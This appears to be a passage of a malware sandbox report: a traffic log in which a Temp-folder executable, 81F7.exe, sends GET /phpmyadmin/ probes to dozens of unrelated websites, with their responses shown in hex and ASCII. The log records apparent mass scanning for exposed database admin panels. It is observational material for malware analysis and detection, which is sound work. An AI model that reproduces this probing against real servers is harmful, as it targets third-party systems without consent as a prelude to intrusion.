vP7tPG7T3nK/D3kVd87fPh7k8V3kQOTyBO0MZkNMTtthzPnUyRIHInlEG+aeQ4wHzVIiWiiNCexcINBmHeyI7OckH3AKKiunVSPKDIsV2lLJhrlCOMd6EbRuVTWYBa6ykTHn1JqJIDS2bdvzx4mr+PHhcRQOi+dvG43k9d1k8e4wED1URX9zRHpxtM/wdPaXKQ02aqvqWhvzlK1G5Zrbw6VnU2/5tc2eZ/T7NSTpL4Y9fY9FZi+mK/eC+8pNJbn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	50942	162.0.235.125	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: norwegischlernen.info Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:04 UTC	409	IN	HTTP/1.1 404 Not Found keep-alive: timeout=5, max=100 expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 content-type: text/html; charset=UTF-8 link: <https://norwegischlernen.info/index.php/wp-json/>; rel="https://api.w.org/" transfer-encoding: chunked date: Tue, 20 Feb 2024 23:26:04 GMT server: LiteSpeed x-turbo-charged-by: LiteSpeed connection: close
2024-02-20 23:26:04 UTC	15975	IN	Data Raw: 39 38 46 46 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f Data Ascii: 98FF<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><meta name='robots' content='max-image-preview:large' /><title>Page not found – norwegischlernen.info
2024-02-20 23:26:04 UTC	16384	IN	Data Raw: 74 69 63 61 6c 2d 73 65 63 6f 6e 64 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 73 65 63 6f 6e 64 61 72 79 29 20 30 25 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 61 63 6b 67 72 6f 75 6e 64 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 74 69 63 61 6c 2d 74 65 72 74 69 61 72 79 2d 74 6f 2d 62 61 63 6b 67 72 6f 75 6e 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 74 6f 20 62 6f 74 74 6f 6d 2c 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 74 65 72 74 69 61 72 79 Data Ascii: tical-secondary-to-background: linear-gradient(to bottom,var(--wp--preset--color--secondary) 0%,var(--wp--preset--color--background) 100%);--wp--preset--gradient--vertical-tertiary-to-background: linear-gradient(to bottom,var(--wp--preset--color--tertiary
2024-02-20 23:26:04 UTC	8169	IN	Data Raw: 69 26 23 30 33 38 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 26 23 30 33 38 3b 76 65 72 3d 36 2e 34 2e 33 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2d 73 74 79 6c 65 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 74 77 65 6e 74 79 74 77 65 6e 74 79 74 77 6f 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 31 2e 36 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6e 6f 72 77 65 67 69 73 63 68 6c 65 72 6e 65 6e 2e 69 6e 66 6f 2f 77 70 2d Data Ascii: i&display=swap&ver=6.4.3' media='all' /><link rel='stylesheet' id='twentytwentytwo-style-css' href='https://norwegischlernen.info/wp-content/themes/twentytwentytwo/style.css?ver=1.6' media='all' /><script src="https://norwegischlernen.info/wp-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	50947	45.147.96.4	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: glazing-bt.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:04 UTC	349	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Location: https://www.glazing-bt.com Strict-Transport-Security: max-age=31536000
2024-02-20 23:26:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.6	50970	13.232.255.130	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	180	OUT	GET /phpmyadmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	163	IN	HTTP/1.1 403 Forbidden Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Content-Length: 94 Connection: close Content-Type: text/html; charset=iso-8859-1
2024-02-20 23:26:05 UTC	94	IN	Data Raw: 46 6f 72 20 73 65 63 75 72 69 74 79 20 72 65 61 73 6f 6e 73 2c 20 74 68 69 73 20 55 52 4c 20 69 73 20 6f 6e 6c 79 20 61 63 63 65 73 73 69 62 6c 65 20 75 73 69 6e 67 20 6c 6f 63 61 6c 68 6f 73 74 20 28 31 32 37 2e 30 2e 30 2e 31 29 20 61 73 20 74 68 65 20 68 6f 73 74 6e 61 6d 65 2e Data Ascii: For security reasons, this URL is only accessible using localhost (127.0.0.1) as the hostname.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.6	50971	217.160.0.208	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	180	OUT	GET /phpmyadmin/ HTTP/1.1 Host: caspiantravel.co.uk Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	208	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=iso-8859-1 Content-Length: 220 Connection: close Date: Tue, 20 Feb 2024 23:26:05 GMT Server: Apache Location: http://www.caspianseagulltravels.com
2024-02-20 23:26:05 UTC	220	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 63 61 73 70 69 61 6e 73 65 61 67 75 6c 6c 74 72 61 76 65 6c 73 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.caspianseagulltravels.com">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	51871	103.224.182.253	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: hotmail.fr.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	271	IN	HTTP/1.1 200 OK date: Tue, 20 Feb 2024 23:26:05 GMT server: Apache set-cookie: __tad=1708471565.7009175; expires=Fri, 17-Feb-2034 23:26:05 GMT; Max-Age=315360000 vary: Accept-Encoding content-length: 168 content-type: text/html; charset=UTF-8 connection: close
2024-02-20 23:26:05 UTC	168	IN	Data Raw: 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 66 72 2e 61 75 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 0a 0a 3c 2f 73 63 72 69 70 74 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 66 66 66 66 66 66 22 20 74 65 78 74 3d 22 23 30 30 30 30 30 30 22 3e 0a 09 3c 21 2d 2d 20 42 6c 61 6e 6b 20 20 2d 2d 3e 0a 3c 2f 62 6f 64 79 3e 0a 0a 3c 2f 68 74 6d 6c 3e 0a 0a 0a Data Ascii: <html><head><title>fr.au</title><script type="text/javascript"></script></head><body bgcolor="#ffffff" text="#000000">... Blank --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
23	192.168.2.6	52010	51.159.190.167	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	178	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cabinet-orsika.fr Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:06 UTC	408	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: close X-Powered-By: PHP/8.1.27 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 X-Redirect-By: WordPress Location: https://www.cabinet-orsika.fr/phpmyadmin/ X-Cache-Status: MISS X-Powered-By: PleskLin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	51874	104.21.66.152	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	171	OUT	GET /phpmyadmin/ HTTP/1.1 Host: att.com.tw Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	51375	3.33.130.190	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	172	OUT	GET /phpmyadmin/ HTTP/1.1 Host: cfgteam.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:04 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_dRUJ9PPbpa1AIHdTMS+whOh4IdJLcdxUTZ1DdBV321BRUQBTxvfUNsl41MzhcqPc58X0l3aJCiseknTzccdfVA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:05 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	51791	3.33.130.190	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	174	OUT	GET /phpmyadmin/ HTTP/1.1 Host: blauthlaw.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_DiIAByhVYT9YwDGGxAO9Z2kMLCT7XEcJQc6ZMB32cte91h5fNthBiapYIfVXG7fE0lbMQi9WMbmvxTfl13WQlA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parkweb;Path=/;Max-Age=86400; Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:05 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	51947	198.185.159.145	443	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:04 UTC	175	OUT	GET /phpmyadmin/ HTTP/1.1 Host: publichouse.ie Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:05 UTC	298	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77562 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:05 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: GK3kK274/NyG7tHwx Connection: close
2024-02-20 23:26:05 UTC	888	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 Data Ascii: <!DOCTYPE html><head> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; t
2024-02-20 23:26:05 UTC	2372	IN	Data Raw: 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 7d 0a 0a 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 30 70 78 29 20 7b 0a 20 Data Ascii: line-height: 2em; } footer span { margin: 0 11px; font-size: 1em; font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) {
2024-02-20 23:26:05 UTC	538	IN	Data Raw: 6d 69 5a 42 48 6d 70 71 30 38 6a 47 70 55 6a 53 64 5a 74 69 39 47 76 54 30 73 50 47 55 56 34 4d 4d 67 45 5a 59 6c 6b 6d 43 48 48 41 4e 6e 36 56 59 42 4a 34 37 70 35 59 70 67 2f 45 75 4d 76 62 4f 64 58 2f 4a 6d 2f 38 6c 76 2b 4c 64 36 66 4d 4b 50 47 78 71 48 49 76 46 67 70 45 78 76 58 6a 45 4b 45 58 54 39 47 6a 67 57 69 53 6b 54 58 52 68 67 7a 2b 33 75 42 46 44 4e 6b 6b 58 62 73 35 66 64 35 32 68 5a 35 30 34 62 4a 4e 61 6f 45 6d 61 57 66 61 53 59 59 6c 42 4c 6b 6b 56 71 42 73 4f 44 4f 6c 58 6e 58 54 2f 2f 66 6f 30 2f 66 6f 42 37 79 53 4b 77 34 67 34 77 79 54 2b 7a 70 6e 4e 4b 2f 61 72 58 75 58 35 74 61 35 4a 31 5a 35 72 30 52 59 77 58 72 52 75 69 4f 6d 39 4e 53 75 68 71 2f 64 33 6a 66 34 64 69 77 71 47 56 47 76 52 42 68 34 6a 6d 77 59 36 4a 44 6f 71 33 61 Data Ascii: miZBHmpq08jGpUjSdZti9GvT0sPGUV4MMgEZYlkmCHHANn6VYBJ47p5Ypg/EuMvbOdX/Jm/8lv+Ld6fMKPGxqHIvFgpExvXjEKEXT9GjgWiSkTXRhgz+3uBFDNkkXbs5fd52hZ504bJNaoEmaWfaSYYlBLkkVqBsODOlXnXT//fo0/foB7ySKw4g4wyT+zpnNK/arXuX5ta5J1Z5r0RYwXrRuiOm9NSuhq/d3jf4diwqGVGvRBh4jmwY6JDoq3a
2024-02-20 23:26:05 UTC	4744	IN	Data Raw: 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a 6d 6b 31 33 69 51 68 5a 70 56 76 77 57 61 65 4a 4a 76 5a 77 6d 5a 66 67 4c 72 4d 45 50 44 73 6d 57 53 65 54 50 32 70 67 42 49 56 71 72 34 34 6c 6a 6e 44 4f 63 34 32 4e 44 66 6d 4b 4a 73 63 52 6e 7a 6a 73 6c 4c 75 38 59 44 37 44 65 55 69 51 74 61 38 71 2b 67 54 4d 38 55 75 4a 67 78 71 73 31 6c 74 6c 78 47 6d 46 33 6d 48 52 65 38 77 37 4d 36 59 4b 62 70 59 57 42 49 5a 77 36 61 62 41 58 6f 49 4e 58 43 48 76 38 57 49 59 64 68 61 75 38 62 57 43 32 56 39 39 31 71 78 55 4b 4c 49 65 53 35 79 6f 63 46 76 32 57 53 65 6a 45 64 66 68 77 Data Ascii: 84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS5yocFv2WSejEdfhw
2024-02-20 23:26:05 UTC	5930	IN	Data Raw: 70 4a 37 65 50 5a 37 7a 32 42 34 6e 4e 71 5a 6c 52 56 48 75 78 69 6a 6c 4a 65 75 42 6c 72 79 73 6c 2b 69 6b 4c 76 59 32 7a 37 51 6c 34 6d 56 68 79 4d 59 37 67 34 49 67 4d 4b 47 45 6f 72 41 2b 6f 45 41 71 53 31 6a 43 78 42 45 73 73 4c 4b 71 37 6c 67 48 36 36 54 62 31 69 75 4f 48 4a 65 4e 34 38 66 32 2b 4b 4c 4f 6b 53 51 47 46 69 74 78 6d 58 61 36 58 30 6a 6c 58 6e 4f 63 77 50 6a 6d 78 73 37 35 4f 6c 77 4c 58 52 56 65 34 71 63 37 6b 4a 34 67 53 4c 69 6b 4c 68 2f 65 49 57 63 44 69 6f 4d 69 33 5a 54 57 61 47 6f 63 71 41 61 45 2b 74 34 6d 32 31 66 2b 6d 36 32 44 63 56 64 70 62 63 59 38 65 6b 34 68 41 55 5a 47 69 6a 58 6a 4c 39 62 33 45 77 6c 72 64 72 75 61 47 4f 31 73 38 45 4a 66 45 52 67 6a 56 6e 72 54 78 4d 31 63 67 7a 5a 6e 6a 69 6d 2f 35 46 42 70 58 78 7a Data Ascii: pJ7ePZ7z2B4nNqZlRVHuxijlJeuBlrysl+ikLvY2z7Ql4mVhyMY7g4IgMKGEorA+oEAqS1jCxBEssLKq7lgH66Tb1iuOHJeN48f2+KLOkSQGFitxmXa6X0jlXnOcwPjmxs75OlwLXRVe4qc7kJ4gSLikLh/eIWcDioMi3ZTWaGocqAaE+t4m21f+m62DcVdpbcY8ek4hAUZGijXjL9b3EwlrdruaGO1s8EJfERgjVnrTxM1cgzZnjim/5FBpXxz
2024-02-20 23:26:05 UTC	7116	IN	Data Raw: 56 77 70 49 45 6f 42 53 77 6f 6f 34 71 46 49 42 55 55 43 46 4b 6d 68 53 49 41 5a 47 62 54 49 59 55 4d 42 46 54 78 55 71 4b 43 43 68 77 6f 56 56 50 42 51 6f 59 49 4b 41 53 72 55 33 77 4d 4d 6b 39 52 41 41 41 42 34 41 58 54 4f 41 37 42 6a 4d 52 53 41 34 66 2b 6d 58 64 75 32 62 64 75 32 6a 66 71 68 75 75 31 71 74 49 4f 31 62 64 75 32 62 64 75 32 62 5a 37 42 4d 6f 4d 76 79 57 45 77 67 4c 67 63 74 46 7a 45 55 72 31 6d 2f 65 59 6b 64 77 55 64 6b 56 53 4d 36 68 4c 79 34 73 59 4b 38 4f 30 62 69 51 45 72 73 59 6c 50 59 70 4b 54 6d 67 78 6b 49 51 64 35 4b 45 41 52 53 6c 43 47 43 72 39 56 47 73 51 67 44 67 6c 49 51 67 72 53 6b 4a 47 73 35 43 51 76 42 53 6c 4b 53 63 70 53 6b 62 67 59 31 61 6f 30 7a 30 78 68 6b 48 70 46 54 4f 4b 53 6b 4b 53 6b 4a 43 32 5a 79 45 59 75 Data Ascii: 